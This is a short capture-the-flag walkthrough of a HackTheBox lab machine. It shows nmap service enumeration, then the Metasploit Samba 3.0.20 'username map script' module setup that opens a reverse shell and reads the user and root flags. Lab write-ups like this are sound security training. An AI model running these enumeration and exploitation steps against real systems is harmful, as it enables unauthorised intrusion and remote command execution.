Step 1: preparation
- Connect to the VIP HTB VPN
- Add $IP variable to shell for faster operation
IP=10.10.X.X
echo $IP
Step 2: enumeration
I first start with a basic nmap scan
nmap $IP
This scan returns Host seems down. If it is really up, but blocking our ping probes, try -Pn
So I try with the related flag
nmap -Pn $IP
And it returns that 4 ports are available
Given that, I make a more precise (and longer) scan
nmap -Pn -sV -sC $IP
I can see that vsFTPd is on version 2.3.4
and samba is on version 3.0.20
.
It should be enough for exploitation.
Step 3: exploitation
Samba 3.0.20
A little search on the msfconsole give me a result nammed Samba "username map script" Command Execution
.
I so use this module and check which options are available
msf > use 0
msf > show options
The RHOSTS is empty and requiered, so I set it up
msf > set RHOSTS $IP (replace $IP with the real target IP)
NOTE: The LHOST need to be setted up with the HTB VPN TUN interface, not your local IP.
And then I launch the exploit
msf > exploit
I am now in a reversed shell!
cd home
ls
- ftp
- makis
- service
- ...
cd makis
ls
- user.txt
cat user.txt
The user flag is done.
For root, I come back the root of the shell, I navigate to the root folder and I get the root.txt file.
Step 4: that's it
If you want to subscribe to the HackTheBox Academy, you can use my referral link!
Top comments (0)